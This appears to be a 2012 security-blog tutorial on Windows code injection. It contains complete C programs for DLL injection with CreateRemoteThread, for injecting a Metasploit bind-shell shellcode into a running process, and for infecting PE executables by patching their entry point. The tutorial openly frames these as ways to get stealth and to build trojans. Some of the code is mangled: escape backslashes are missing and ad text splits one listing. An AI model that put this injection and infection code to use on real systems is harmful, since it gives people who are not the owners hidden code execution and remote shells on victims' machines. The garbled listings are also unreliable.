Hacking

Executable Code Injection

Introduction

Code injection is a process of injecting executable code in a running process or static executable. Executable code in web applications can be injected by exploiting them with XSS (cross site scripting), LFI (local file inclusion), or remote file inclusion vulnerabilities (RFI). On the other hand, code can be injected in an executable using the following methods:

FREE role-guided training plans

Get 12 cybersecurity training plans — one for each of the most common roles requested by employers.

Download Now

1: Code injection using CreateRemoteThread API.

2: PE file infection.

Code injection is mainly used when we exploit a vulnerability leading to process flow hijacking, when we supply executable code as a buffer called a shellcode.

Code injection techniques are mainly used to achieve stealth in memory execution, create trojan horses, process migration in post-exploitation (as seen in Metasploit), and for dynamic binary instrumentation and profiling.

I will use a diagram to illustrate code injection in a running process. This diagram illustrates the injection of code in a foreign process, having process id as X. We are able to inject our code in that process without leaving any traces.

In the C code given below, we will use createRemoteThread api to inject a dll (dynamic link library) into a running process.

[plain]

/*

===========================================================

Code injection using CreateRemoteThread API

(C) Raashid bhat

===========================================================

Compile with msvc

*/

#include <stdio.h>

#define WIN32_lEAN_AND_MEAN // skip unnecessary header file includes

#include <windows.h>

/* Disable Some Warnings */

#pragma warning(disable:4133)

#pragma warning(disable:4022)

#pragma warning(disable:4047)

#pragma warning(disable:4024)

int main( int argc, char **argv)

{

int pID;

LPVOID Addr = NULL;

LPVOID mem = NULL;

DWORD permissions = PROCESS_QUERY_INFORMATION | PROCESS_CREATE_THREAD

| PROCESS_VM_OPERATION |PROCESS_VM_WRITE;

HANDLE hProcess;

char *dll_name = (char*) malloc(sizeof(char) * MAX_PATH);

strcpy(dll_name, "full DLL path here"); //copy dll name

if (argc != 2)

{

printf("Usage : %s <Process_id>", argv[0]);

exit(EXIT_FAILURE);

}

pID = atoi(argv[1]); // convert string to number and get PID

hProcess = OpenProcess( permissions,FALSE, pID); // Open process with process id pID

if (hProcess == NULL)

{

printf("%s %d", "unable to open process ", pID);

exit(EXIT_FAILURE);

}

Addr = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA"); // Get the address of LoadLibraryA

if (Addr == NULL)

{

printf("%s", "Cannot load kernel32.dll");

exit(EXIT_FAILURE);

}

mem = VirtualAllocEx( hProcess, NULL, strlen(dll_name) + 1,MEM_RESERVE

| MEM_COMMIT, PAGE_READWRITE ); // allocate memory in the process to hold the name of dll

if (mem == NULL)

{

printf("%s", "failed to allocate memory in foriegn process" );

exit(EXIT_FAILURE);

}

WriteProcessMemory(hProcess, mem, dll_name, strlen(dll_name) +1 , NULL) ; // write the dll name to the process memory

if (!CreateRemoteThread(hProcess, NULL, 0, Addr, mem, 0, NULL))

{

printf("%s", "CreateRemoteThread failed");

exit(EXIT_FAILURE);

}

printf("%s", "Dll injected ");

return 0;

}

[/plain]

Then perform the following steps:

1: Firstly we get the dll name and the process pid (PID)

2: Open the process of specified process id (pID)

3: Allocate some memory in the remote process by using VirtualAllocEx

4: Store the name of the dll to be injected in that allocated memory

5: Retrieve the address of LoadLibraryA in kernel32.dll

6: Create a remote thread at LoadLibrary location in kernnel32.dll and pass dll name as an argument to the thread.

At this point, the thread actually starts at LoadLibraryA in kernel32.dll, with the parameter as the dll name:

LoadLibrary("dll name");

which loads the specified DLL in the address space of the foreign process. Let's now create a sample Dll named as sample.dll and we will inject it in the process with notepad.exe:

[plain]

source: sample.cpp

/* Sample DLL to be injeted (C) 2012 Raashid Bhat */ #include <windows.h> BOOL APIENTRY DllMain(HMODULE hModule, DWORD ulReason, LPVOID lpReserved) {

switch (ulReason) { case DLL_PROCESS_ATTACH: { MessageBox(NULL, "Hello world!", "Hello World!", MB_OK); break; } case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH:

break; } return (TRUE); }

[/plain]

This sample code pops out a messsage box saying "Hello world!" when the dll is injected in the remote process.

Using the following command we will be able to determine the process id of notepad.exe:

tasklist | find "notepad.exe"

which gives us the following output:

notepad.exe 1028 Console 1 6,612 K

So from that we are able to determine the process id of notepad.exe; for now it is 1028. Now we will execute our program with parameter as PID of notepad.exe to inject x.dll in the address space of notepad.exe:

We can also verify that by opening the process in a debugger, then checking out the dll's loaded by the process. In this case we will use immunity debugger.

But the disadvantage of this technique is the dll injected is visible in the address space of the executable, and in fact it's not a stealthy way of injecting code. Moreover the dll to be injected has to be present on the local path of the victim.

To achieve a stealthy code injection, we will use a Metasploit shell code as a thread function.

[plain]

/*

=================================================================

Code injection using CreateRemoteThread API(shellcode injection)

(C) Rashid bhatt

=================================================================

Compile with msvc

*/

#include <stdio.h>

#define WIN32_lEAN_AND_MEAN // skip unnecessary header file includes

#include <windows.h>

// Metasploit shell bind tcp Port 4444

unsigned char buf[] =

"x6ax56x59xd9xeexd9x74x24xf4x5bx81x73x13xc9xa3"

"xaaxe0x83xebxfcxe2xf4x35x4bx23xe0xc9xa3xcax69"

"x2cx92x78x84x42xf1x9ax6bx9bxafx21xb2xddx28xd8"

"xc8xc6x14xe0xc6xf8x5cx9bx20x65x9fxcbx9cxcbx8f"

"x8ax21x06xaexabx27x2bx53xf8xb7x42xf1xbax6bx8b"

"x9fxabx30x42xe3xd2x65x09xd7xe0xe1x19xf3x21xa8"

"xd1x28xf2xc0xc8x70x49xdcx80x28x9ex6bxc8x75x9b"

"x1fxf8x63x06x21x06xaexabx27xf1x43xdfx14xcaxde"

"x52xdbxb4x87xdfx02x91x28xf2xc4xc8x70xccx6bxc5"

"xe8x21xb8xd5xa2x79x6bxcdx28xabx30x40xe7x8exc4"

"x92xf8xcbxb9x93xf2x55x00x91xfcxf0x6bxdbx48x2c"

"xbdxa1x90x98xe0xc9xcbxddx93xfbxfcxfex88x85xd4"

"x8cxe7x36x76x12x70xc8xa3xaaxc9x0dxf7xfax88xe0"

"x23xc1xe0x36x76xfaxb0x99xf3xeaxb0x89xf3xc2x0a"

"xc6x7cx4ax1fx1cx2ax6dxd1x12xf0xc2xe2xc9xb2xf6"

"x69x2fxc9xbaxb6x9excbx68x3bxfexc4x55x35x9axf4"

"xc2x57x20x9bx55x1fx1cxf0xf9xb7xa1xd7x46xdbx28"

"x5cx7fxb7x40x64xc2x95xa7xeexcbx1fx1cxcbxc9x8d"

"xadxa3x23x03x9exf4xfdxd1x3fxc9xb8xb9x9fx41x57"

"x86x0exe7x8exdcxc8xa2x27xa4xedxb3x6cxe0x8dxf7"

"xfaxb6x9fxf5xecxb6x87xf5xfcxb3x9fxcbxd3x2cxf6"

"x25x55x35x40x43xe4xb6x8fx5cx9ax88xc1x24xb7x80"

"x36x76x11x10x7cx01xfcx88x6fx36x17x7dx36x76x96"

"xe6xb5xa9x2ax1bx29xd6xafx5bx8exb0xd8x8fxa3xa3"

"xf9x1fx1cxa3xaaxe0";

/* Disable Some Warnings */

#pragma warning(disable:4133)

#pragma warning(disable:4022)

#pragma warning(disable:4047)

#pragma warning(disable:4024)

int main( int argc, char **argv)

{

int pID;

LPVOID Addr = NULL;

LPVOID mem = NULL;

DWORD permissions = PROCESS_QUERY_INFORMATION | PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION |PROCESS_VM_WRITE;

HANDLE hProcess;

char *dll_name = (char*) malloc(sizeof(char) * MAX_PATH);

if (argc != 2)

{

printf("Usage : %s <Process_id>", argv[0]);

exit(EXIT_FAILURE);

}

pID = atoi(argv[1]); // convert string to number and get PID

hProcess = OpenProcess(permissions,FALSE, pID); // Open process with process id pID

if (hProcess == NULL)

{

printf("%s %d", "unable to open process ", pID);

exit(EXIT_FAILURE);

}

mem = VirtualAllocEx( hProcess, NULL, sizeof(buf) + 1,MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); // allocate memory in the process to hold the name of dll ( PAGE_EXECUTE for DEP )

if (mem == NULL)

{

printf("%s", "failed to allocate memory in foriegn process" );

exit(EXIT_FAILURE);

}

WriteProcessMemory(hProcess, mem, buf, sizeof(buf) +1 , NULL) ; // write the dll name to the process memory

CreateRemoteThread(hProcess, NULL, 0, mem, NULL, 0, NULL);

printf("%s", "Code injected");

return 0;

}

[/plain]

Portable Executable File Infection

An executable file under Windows is known as a portable executable. Portable executable (PE) is the file format for an executable under Windows operating systems. A portable executable file consists of headers and sections. Sections are are memory regions which may be either code, data or other important data structures, for example import address table, export address table or relocate table.

These special sections consist certain information for an executable to run. For example, import address table (IAT) consists of information regarding the dll and functions used from those particular dll's. In the same way, the export address table consists of information related to the function exported by the executable, which is in case of dll's.

The figure given below is a typical layout of the portable executable format:

As we can see above, the PE file even consists of information regarding the old DOS header for backward compatibility.

I wrote a nice utility known as Texe http://texe.codeplex.com/ reads a portable executable and outputs the information regarding the PE file in a html file. It also gives out the disassembly of the executable's code section.

There is an another utility shipped with Microsoft sdk known as dumpbin.exe, which reads an executable and dumps information related to its sections.

Here is a sample dumpbin.exe output:

dumpbin sample.exe

Microsoft (R) COFF/PE Dumper Version 10.00.30319.01

Dump of file sample.exe

PE signature found

File Type: EXECUTABLE IMAGE

FILE HEADER VALUES

14C machine (x86)

2 number of sections

0 time date stamp Thu Jan 01 05:30:00 1970

0 file pointer to symbol table

0 number of symbols

E0 size of optional header

30F characteristics

Relocations stripped

Executable

Line numbers stripped

Symbols stripped

32 bit word machine

Debug information stripped

OPTIONAL HEADER VALUES

10B magic # (PE32)

6.00 linker version

0 size of code

0 size of initialized data

0 size of uninitialized data

1040 entry point (00401040)

1000 base of code

2000 base of data

400000 image base (00400000 to 00402FFF)

1000 section alignment

200 file alignment

4.00 operating system version

0.00 image version

4.00 subsystem version

0 Win32 version

3000 size of image

200 size of headers

0 checksum

3 subsystem (Windows CUI)

0 DLL characteristics

100000 size of stack reserve

1000 size of stack commit

100000 size of heap reserve

1000 size of heap commit

0 loader flags

10 number of directories

0 [ 0] RVA [size] of Export Directory

2180 [ 28] RVA [size] of Import Directory

0 [ 0] RVA [size] of Resource Directory

0 [ 0] RVA [size] of Exception Directory

0 [ 0] RVA [size] of Certificates Directory

0 [ 0] RVA [size] of Base Relocation Directory

0 [ 0] RVA [size] of Debug Directory

0 [ 0] RVA [size] of Architecture Directory

0 [ 0] RVA [size] of Global Pointer Directory

0 [ 0] RVA [size] of Thread Storage Directory

0 [ 0] RVA [size] of Load Configuration Directory

0 [ 0] RVA [size] of Bound Import Directory

21A8 [ 14] RVA [size] of Import Address Table Directory

0 [ 0] RVA [size] of Delay Import Directory

0 [ 0] RVA [size] of COM Descriptor Directory

0 [ 0] RVA [size] of Reserved Directory

SECTION HEADER #1

.text name

D8 virtual size

1000 virtual address (00401000 to 004010D7)

200 size of raw data

200 file pointer to raw data (00000200 to 000003FF)

0 file pointer to relocation table

0 file pointer to line numbers

0 number of relocations

0 number of line numbers

60000020 flags

Code

Execute Read

and so on. You can see in the above output given, Dumpbin provides the information about the PE (portable executable) in a similar way as Texe.

Now here we only interested in certain fields in a portable executable file, like base of code, no of section.

In this type of code injection technique, we will try to infect an already existing portable executable file.

This technique makes use of the junk bytes allocated by the compiler at the end of the code section to make it align to a certain boundary, and later on changes the AddressOfEntryPoint of the PE to offset the injected code.

[plain]

/* ============================================================

PE File Injection

(C) Raashid Bhat 2012

*/

#define WIN32_LEAN_AND_MEAN // skip unnecessay includes

#include <windows.h>

#include <winNT.h> // struct definitions for Portable executable file

#include <stdio.h>

#include <stdlib.h>

unsigned char buf[] = "xdexadxbexef"; // Your Assmebly Code here

unsigned char uSeq[] = "xB8xFFxBExADxDExFFxE0"; // MOV EAX,0xdeadbeef; JMP EAX JMP back to Original Entry Point

void usage(char *pName)

{

printf("n%s <exe_name>", pName);

return;

}

int main(int argc, char **argv)

{

short iSection = 0;

unsigned int iDelta = 0;

DWORD iPos = 0;

int a = 0;

unsigned char * pSectionData ;

FILE *fp = NULL;

PIMAGE_DOS_HEADER sDosHeader = (PIMAGE_DOS_HEADER) malloc(sizeof(IMAGE_DOS_HEADER)); // DOS Header defined in Winnt.h

PIMAGE_NT_HEADERS32 sPEHeader = (PIMAGE_NT_HEADERS32) malloc(sizeof(IMAGE_NT_HEADERS32));

PIMAGE_SECTION_HEADER sSection = NULL, tmp; // keep as null, later allocate on the based of iSections

if (argc != 2)

{

usage(argv[0]);

exit(EXIT_FAILURE);

}

fp = fopen(argv[1], "r+b");

if (!sDosHeader)

{

printf("%s","Cannot allocate memory");

exit(-1);

}

fread(sDosHeader, sizeof(IMAGE_DOS_HEADER), 1, fp);

if (sDosHeader->e_magic != IMAGE_DOS_SIGNATURE)

{

printf("%s", "Not a valid PE image");

exit(EXIT_FAILURE);

}

fseek(fp, sDosHeader->e_lfanew, SEEK_SET);

fread(sPEHeader, sizeof(IMAGE_NT_HEADERS32), 1, fp);

sSection = (PIMAGE_SECTION_HEADER) malloc(sizeof(IMAGE_SECTION_HEADER) * sPEHeader->FileHeader.NumberOfSections);

fread(sSection, sizeof(IMAGE_SECTION_HEADER) * sPEHeader->FileHeader.NumberOfSections, 1, fp);

printf("no of sections in PE %dn", sPEHeader->FileHeader.NumberOfSections);

while(1)

{

if (sSection->VirtualAddress == sPEHeader->OptionalHeader.BaseOfCode) // look for the code section

{

break;
 }

sSection += 1;

}

iDelta = sSection->SizeOfRawData;

pSectionData = (unsigned char*) malloc(sizeof(unsigned char) * iDelta );

fseek(fp, sSection->PointerToRawData + sSection->Misc.VirtualSize , SEEK_SET);

iPos = sSection->Misc.VirtualSize + sPEHeader->OptionalHeader.BaseOfCode;

if( iDelta - sSection->Misc.VirtualSize < sizeof(buf))

{

printf("%s", "Cannot Inject Code");

exit(EXIT_FAILURE);

}

fwrite(buf, sizeof(buf) - 1, 1, fp); // Write Bytes to Executable File

a = sPEHeader->OptionalHeader.AddressOfEntryPoint + sPEHeader->OptionalHeader.ImageBase;

memcpy(&uSeq[1] , &a, sizeof(DWORD));

fwrite( uSeq, sizeof(uSeq), 1, fp);

/* rewind back and change AddressOfEntrypoint to make Executable's EP to our injected code */

rewind(fp);

fseek(fp, sDosHeader->e_lfanew, SEEK_SET);

sPEHeader->OptionalHeader.AddressOfEntryPoint = iPos;

fwrite( sPEHeader, sizeof(IMAGE_NT_HEADERS32), 1, fp);

printf("%s %s" , "Code Injected in file " argv[1]);

free(sDosHeader);

free(sPEHeader);

free(sSection);

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

Get Your Plan

fclose(fp);

return 0;

}

[/plain]

Posted: November 9, 2012

D12d0x34X

View Profile

Rashid Bhat is an Independent Security Researcher as well as a contributor to InfoSec Institute. His areas of expertise include exploitation, malware analysis and reverse engineering. Twitter: http://twitter.com/raashidbhatt

Executable Code Injection

Get certified and advance your career